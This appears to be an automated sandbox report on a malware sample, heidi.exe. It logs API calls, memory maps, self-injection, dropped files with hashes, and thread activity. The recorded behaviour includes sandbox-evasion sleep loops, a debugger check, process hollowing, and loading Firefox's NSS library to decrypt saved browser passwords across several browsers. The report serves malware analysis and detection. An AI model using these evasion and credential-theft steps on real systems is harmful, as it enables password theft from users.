Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EnumDisplayMonitors, address_out = 0x7595451a True 1
Fn
Module Get Filename module_name = c:\users\kft6utqw\appdata\local\temp\heidi.exe, process_name = c:\users\kft6utqw\appdata\local\temp\heidi.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Temp\heidi.exe, size = 256 True 1
Fn
Window Create window_name = heidi, class_name = TApplication, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = heidi, class_name = TApplication, index = 18446744073709551612, new_long = 1708015 True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x75930000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = AnimateWindow, address_out = 0x7595b531 True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x73af0000 True 1
Fn
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = InitializeFlatSB, address_out = 0x73b2266f True 1
Fn
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = UninitializeFlatSB, address_out = 0x73b22542 True 1
Fn
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_GetScrollProp, address_out = 0x73b21d29 True 1
Fn
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_SetScrollProp, address_out = 0x73b2238d True 1
Fn
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_EnableScrollBar, address_out = 0x73b220c9 True 1
Fn
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_ShowScrollBar, address_out = 0x73b21fdb True 1
Fn
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_GetScrollRange, address_out = 0x73b21e8d True 1
Fn
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_GetScrollInfo, address_out = 0x73b21f0f True 1
Fn
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_GetScrollPos, address_out = 0x73b21ccd True 1
Fn
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_SetScrollPos, address_out = 0x73b2216d True 1
Fn
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_SetScrollInfo, address_out = 0x73b222be True 1
Fn
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_SetScrollRange, address_out = 0x73b221e2 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x75930000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetLayeredWindowAttributes, address_out = 0x7596ec88 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ole32.dll, base_address = 0x75e10000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstanceEx, address_out = 0x75e59d4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x75e509ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoAddRefServerProcess, address_out = 0x75e73cf3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoReleaseServerProcess, address_out = 0x75e74314 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoResumeClassObjects, address_out = 0x75e1ea02 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoSuspendClassObjects, address_out = 0x75e7bb02 True 1
Fn
Module Load module_name = olepro32.dll, base_address = 0x75270000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\olepro32.dll, function = OleCreatePropertyFrame, address_out = 0x752720ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\olepro32.dll, function = OleCreateFontIndirect, address_out = 0x752720b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\olepro32.dll, function = OleCreatePictureIndirect, address_out = 0x752720c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\olepro32.dll, function = OleLoadPicture, address_out = 0x752720d9 True 1
Fn
System Get Cursor x_out = 1404, y_out = 317 True 2
Fn
System Sleep duration = 18 milliseconds (0.018 seconds) True 1
Fn
System Sleep duration = 206 milliseconds (0.206 seconds) True 1
Fn
System Get Cursor x_out = 1404, y_out = 317 True 1
Fn
System Sleep duration = 18 milliseconds (0.018 seconds) True 1
Fn
System Sleep duration = 206 milliseconds (0.206 seconds) True 1
Fn
System Get Cursor x_out = 1404, y_out = 317 True 1
Fn
System Sleep duration = 18 milliseconds (0.018 seconds) True 1
Fn
System Sleep duration = 206 milliseconds (0.206 seconds) True 1
Fn
System Get Cursor x_out = 1404, y_out = 317 True 1
Fn
System Sleep duration = 18 milliseconds (0.018 seconds) True 1
Fn
System Sleep duration = 206 milliseconds (0.206 seconds) True 1
Fn
System Get Cursor x_out = 1404, y_out = 317 True 1
Fn
System Sleep duration = 18 milliseconds (0.018 seconds) True 1
Fn
System Sleep duration = 206 milliseconds (0.206 seconds) True 1
Fn
System Get Cursor x_out = 1404, y_out = 317 True 1
Fn
System Sleep duration = 18 milliseconds (0.018 seconds) True 1
Fn
System Sleep duration = 206 milliseconds (0.206 seconds) True 1
Fn
System Get Cursor x_out = 1404, y_out = 317 True 1
Fn
System Sleep duration = 18 milliseconds (0.018 seconds) True 1
Fn
System Sleep duration = 206 milliseconds (0.206 seconds) True 1
Fn
System Get Cursor x_out = 1404, y_out = 317 True 1
Fn
System Sleep duration = 18 milliseconds (0.018 seconds) True 1
Fn
System Sleep duration = 206 milliseconds (0.206 seconds) True 1
Fn
System Get Cursor x_out = 1404, y_out = 317 True 1
Fn
System Sleep duration = 18 milliseconds (0.018 seconds) True 1
Fn
System Sleep duration = 206 milliseconds (0.206 seconds) True 1
Fn
System Get Cursor x_out = 1404, y_out = 317 True 1
Fn
System Sleep duration = 18 milliseconds (0.018 seconds) True 1
Fn
System Sleep duration = 206 milliseconds (0.206 seconds) True 1
Fn
System Get Cursor x_out = 1404, y_out = 317 True 1
Fn
System Sleep duration = 18 milliseconds (0.018 seconds) True 1
Fn
Module Load module_name = shell32, base_address = 0x76100000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = advapi32, base_address = 0x77330000 True 1
Fn
Module Get Filename module_name = C:\Users\kFT6uTQW\AppData\Local\Temp\heidi.EN, process_name = c:\users\kft6utqw\appdata\local\temp\heidi.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Temp\heidi.exe, size = 260 True 1
Fn
Debug Check for Presence c:\users\kft6utqw\appdata\local\temp\heidi.exe True 1
Fn
Debug Check for Presence c:\users\kft6utqw\appdata\local\temp\heidi.exe False 1
Fn
Module Get Handle module_name = c:\users\kft6utqw\appdata\local\temp\heidi.exe, base_address = 0x400000 True 237
Fn
Module Unmap - True 1
Fn
Module Create Mapping protection = PAGE_EXECUTE_READWRITE, maximum_size = 1636264 True 1
Fn
Module Map process_name = c:\users\kft6utqw\appdata\local\temp\heidi.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x1ed0000 True 1
Fn
Module Map protection = PAGE_EXECUTE_READWRITE, address_out = 0x400000 True 1
Fn
Module Create Mapping protection = PAGE_EXECUTE_READWRITE, maximum_size = 1636264 True 1
Fn
Module Map protection = PAGE_EXECUTE_READWRITE, address_out = 0x1a0000 True 1
Fn
Module Map process_name = c:\users\kft6utqw\appdata\local\temp\heidi.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x1c70000 True 1
Fn
Process #4: heidi.exe
(Host: 338, Network: 46)
+
Information Value
ID #4
File Name c:\users\kft6utqw\appdata\local\temp\heidi.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Temp\heidi.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:02:13, Reason: Child Process
Unmonitor End Time: 00:03:39, Reason: Terminated by Timeout
Monitor Duration 00:01:26
OS Process Information
+
Information Value
PID 0xa70
Parent PID 0xa3c (c:\users\kft6utqw\appdata\local\temp\heidi.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Groups
  • XABNCPUWKW\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000de82 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x A74
0x A90
0x A98
0x A9C
0x AEC
0x B7C
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000001a0000 0x001a0000 0x001a0fff Pagefile Backed Memory Readable, Writable, Executable True False False
locale.nls 0x001b0000 0x00216fff Memory Mapped File Readable False False False
rsaenh.dll 0x00220000 0x0025bfff Memory Mapped File Readable False False False
private_0x0000000000220000 0x00220000 0x0025ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000220000 0x00220000 0x00220fff Pagefile Backed Memory Readable, Writable True False False
tzres.dll 0x00230000 0x00230fff Memory Mapped File Readable False False False
private_0x0000000000230000 0x00230000 0x00234fff Private Memory Readable, Writable True False False
private_0x0000000000230000 0x00230000 0x00230fff Private Memory Readable, Writable True False False
pagefile_0x0000000000240000 0x00240000 0x00246fff Pagefile Backed Memory Readable True False False
private_0x0000000000250000 0x00250000 0x0025ffff Private Memory Readable, Writable True False False
private_0x0000000000250000 0x00250000 0x00251fff Private Memory Readable, Writable True False False
private_0x0000000000260000 0x00260000 0x002dffff Private Memory Readable, Writable True False False
pagefile_0x00000000002e0000 0x002e0000 0x002e1fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000002f0000 0x002f0000 0x0032ffff Private Memory Readable, Writable True False False
private_0x0000000000350000 0x00350000 0x0035ffff Private Memory Readable, Writable True False False
private_0x0000000000360000 0x00360000 0x0039ffff Private Memory Readable, Writable True False False
private_0x00000000003a0000 0x003a0000 0x003dffff Private Memory Readable, Writable True False False
heidi.exe 0x00400000 0x004b8fff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000400000 0x00400000 0x004a1fff Pagefile Backed Memory Readable, Writable, Executable True False False
private_0x00000000004b0000 0x004b0000 0x0055ffff Private Memory Readable, Writable True False False
private_0x00000000004b0000 0x004b0000 0x004effff Private Memory Readable, Writable True False False
private_0x0000000000520000 0x00520000 0x0055ffff Private Memory Readable, Writable True False False
private_0x0000000000560000 0x00560000 0x0065ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000660000 0x00660000 0x007e7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000007f0000 0x007f0000 0x00970fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000980000 0x00980000 0x01d7ffff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x01d80000 0x0204efff Memory Mapped File Readable False False False
private_0x0000000002050000 0x02050000 0x0214ffff Private Memory Readable, Writable True False False
private_0x0000000002150000 0x02150000 0x02250fff Private Memory Readable, Writable True False False
private_0x0000000002150000 0x02150000 0x0224ffff Private Memory Readable, Writable True False False
private_0x0000000002150000 0x02150000 0x021cffff Private Memory Readable, Writable True False False
private_0x0000000002200000 0x02200000 0x022fffff Private Memory Readable, Writable True False False
pagefile_0x0000000002300000 0x02300000 0x026f2fff Pagefile Backed Memory Readable True False False
private_0x0000000002700000 0x02700000 0x02800fff Private Memory Readable, Writable True False False
private_0x0000000002700000 0x02700000 0x027fffff Private Memory Readable, Writable True False False
private_0x0000000002800000 0x02800000 0x028fffff Private Memory Readable, Writable True False False
private_0x0000000002900000 0x02900000 0x02b2ffff Private Memory Readable, Writable True False False
private_0x0000000002900000 0x02900000 0x029fffff Private Memory Readable, Writable True False False
private_0x0000000002af0000 0x02af0000 0x02b2ffff Private Memory Readable, Writable True False False
private_0x0000000002b30000 0x02b30000 0x02c2ffff Private Memory Readable, Writable True False False
wow64cpu.dll 0x74ef0000 0x74ef7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x74f00000 0x74f5bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74f60000 0x74f9efff Memory Mapped File Readable, Writable, Executable False False False
freebl3.dll 0x75140000 0x7518efff Memory Mapped File Readable, Writable, Executable False False False
nssdbm3.dll 0x75190000 0x751a6fff Memory Mapped File Readable, Writable, Executable False False False
softokn3.dll 0x751b0000 0x751d6fff Memory Mapped File Readable, Writable, Executable False False False
msvcp100.dll 0x751e0000 0x75248fff Memory Mapped File Readable, Writable, Executable False False False
mozglue.dll 0x75250000 0x75271fff Memory Mapped File Readable, Writable, Executable False False False
msvcr100.dll 0x75280000 0x7533efff Memory Mapped File Readable, Writable, Executable False False False
wsock32.dll 0x75340000 0x75346fff Memory Mapped File Readable, Writable, Executable False False False
winmm.dll 0x75350000 0x75381fff Memory Mapped File Readable, Writable, Executable False False False
wshtcpip.dll 0x75350000 0x75354fff Memory Mapped File Readable, Writable, Executable False False False
wship6.dll 0x75360000 0x75365fff Memory Mapped File Readable, Writable, Executable False False False
rasadhlp.dll 0x75370000 0x75375fff Memory Mapped File Readable, Writable, Executable False False False
fwpuclnt.dll 0x75380000 0x753b7fff Memory Mapped File Readable, Writable, Executable False False False
nss3.dll 0x75390000 0x75544fff Memory Mapped File Readable, Writable, Executable False False False
winnsi.dll 0x753c0000 0x753c6fff Memory Mapped File Readable, Writable, Executable False False False
iphlpapi.dll 0x753d0000 0x753ebfff Memory Mapped File Readable, Writable, Executable False False False
dnsapi.dll 0x753f0000 0x75433fff Memory Mapped File Readable, Writable, Executable False False False
mswsock.dll 0x75440000 0x7547bfff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x75480000 0x75496fff Memory Mapped File Readable, Writable, Executable False False False
samlib.dll 0x754a0000 0x754b1fff Memory Mapped File Readable, Writable, Executable False False False
samcli.dll 0x754c0000 0x754cefff Memory Mapped File Readable, Writable, Executable False False False
wkscli.dll 0x754d0000 0x754defff Memory Mapped File Readable, Writable, Executable False False False
srvcli.dll 0x754e0000 0x754f8fff Memory Mapped File Readable, Writable, Executable False False False
netutils.dll 0x75500000 0x75508fff Memory Mapped File Readable, Writable, Executable False False False
netapi32.dll 0x75510000 0x75520fff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x75530000 0x7553afff Memory Mapped File Readable, Writable, Executable False False False
vaultcli.dll 0x75540000 0x7554bfff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x75550000 0x7558afff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x75590000 0x755a5fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x756b0000 0x756bbfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x756c0000 0x7571ffff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x75720000 0x757ebfff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x757f0000 0x7587efff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75930000 0x75a2ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x75a60000 0x75abffff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x75b90000 0x75cacfff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x75e00000 0x75e0bfff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75e10000 0x75f6bfff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76010000 0x760fffff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x76100000 0x76d49fff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76d50000 0x76decfff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76df0000 0x76efffff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76f00000 0x76f09fff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76f10000 0x76f66fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x77330000 0x773cffff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x773d0000 0x77415fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x77420000 0x774affff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x774b0000 0x7755bfff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x77700000 0x77718fff Memory Mapped File Readable, Writable, Executable False False False
ws2_32.dll 0x77720000 0x77754fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000077760000 0x77760000 0x77859fff Private Memory Readable, Writable, Executable True False False
private_0x0000000077860000 0x77860000 0x7797efff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x77980000 0x77b28fff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x77b30000 0x77b35fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77b60000 0x77cdffff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Injection Information
+
Injection Type Source Process Source Os Thread ID Injection Info Success Count Logfile
Modify Memory #3: c:\users\kft6utqw\appdata\local\temp\heidi.exe 0xa40 address = 0x400000, size = 663552 True 1
Fn
Modify Memory #3: c:\users\kft6utqw\appdata\local\temp\heidi.exe 0xa40 address = 0x1a0000, size = 4096 True 1
Fn
Modify Control Flow #3: c:\users\kft6utqw\appdata\local\temp\heidi.exe 0xa40 os_tid = 0xa74, address = 0x1c70000 True 1
Fn
Created Files
+
Filename File Size Hash Values YARA Match Actions
c:\users\kft6utqw\appdata\roaming\98e541\12eef2.exe 717.50 KB (734720 bytes) MD5: a6a97f17880e37067c822e14a75bb3af
SHA1: 1aab183abb65685af92b201a2e47ba3d9ce0856e
SHA256: b1eeec190113584579fe9376b88933d5e1871b3e8fdc86d8a490db4d044196ac
False
c:\users\kft6utqw\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-1534390919-4215197118-2202912847-1000\31665589e43aaafc284e70c59b175d25_7c68ff26-a003-470d-b2af-255a5acd32f2 0.05 KB (49 bytes) MD5: 884bb48a55da67b4812805cb8905277d
SHA1: 6b3d33e00f5b9deae2826f80644cb4f6e78b7401
SHA256: 78877fa898f0b4c45c9c33ae941e40617ad7c8657a307db62bc5691f92f4f60e
False
c:\users\kft6utqw\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-1534390919-4215197118-2202912847-1000\31665589e43aaafc284e70c59b175d25_7c68ff26-a003-470d-b2af-255a5acd32f2 0.05 KB (49 bytes) MD5: 5c2c94ca91d5485579b54b3a7b19b805
SHA1: 2c83b907fabea29308a58c94b3a9a128acd48ceb
SHA256: 3cdf206ecf28d38a849329a7ff4e3acf3edc35a83f7692ef0074984dcbedb326
False
c:\users\kft6utqw\appdata\roaming\98e541\12eef2.hdb 0.00 KB (4 bytes) MD5: aced026ed487b5cbb298f9ab09e6f1c1
SHA1: 1ceff0fbc90b0f2c6fab37bcde68f2a9170a7cf8
SHA256: c22bcce160e0645d030b554a30a0671bc2b2f30b1654dcd4111d871bb9c8e6bf
False
Threads
Thread 0xa74
(Host: 270, Network: 46)
+
Category Operation Information Success Count Logfile
Module Load module_name = SHELL32, base_address = 0x76100000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = OLEAUT32.dll, base_address = 0x757f0000 True 1
Fn
Module Load module_name = ws2_32.dll, base_address = 0x77720000 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75e10000 True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography, value_name = MachineGuid, data = 55 True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 7
Fn
Mutex Create mutex_name = 73EE9CC98E5412EEF2B9A336 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox, value_name = CurrentVersion True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\25.0 (en-US)\Main, value_name = Install Directory True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 2
Fn
Environment Set Environment String name = PATH, value = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Mozilla Firefox True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, base_address = 0x75390000 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = NSS_Init, address_out = 0x7544d70b True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = NSS_Shutdown, address_out = 0x7544d13c True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_GetInternalKeySlot, address_out = 0x753e3c51 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_FreeSlot, address_out = 0x753e3333 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_Authenticate, address_out = 0x753cd3ca True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11SDR_Decrypt, address_out = 0x753e00a7 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_CheckUserPassword, address_out = 0x753ccbc4 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = SECITEM_FreeItem, address_out = 0x7544e656 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, base_address = 0x75390000 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_finalize, address_out = 0x754c9f60 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_step, address_out = 0x754e5200 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_close, address_out = 0x754cbde0 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_column_text, address_out = 0x7549d400 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_open16, address_out = 0x754f1cd0 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_prepare_v2, address_out = 0x7547cea0 True 1
Fn
Module Load module_name = SHELL32, base_address = 0x76100000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile0, key_name = Path, data_out = Profiles/p7ap74gw.default True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 2
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile1, key_name = Path False 1
Fn
Environment Set Environment String name = PATH, value = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\ComodoGroup\IceDragon\Setup, value_name = SetupPath False 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Apple Computer, Inc.\Safari, value_name = InstallDir False 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\K-Meleon, value_name = CurrentVersion False 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
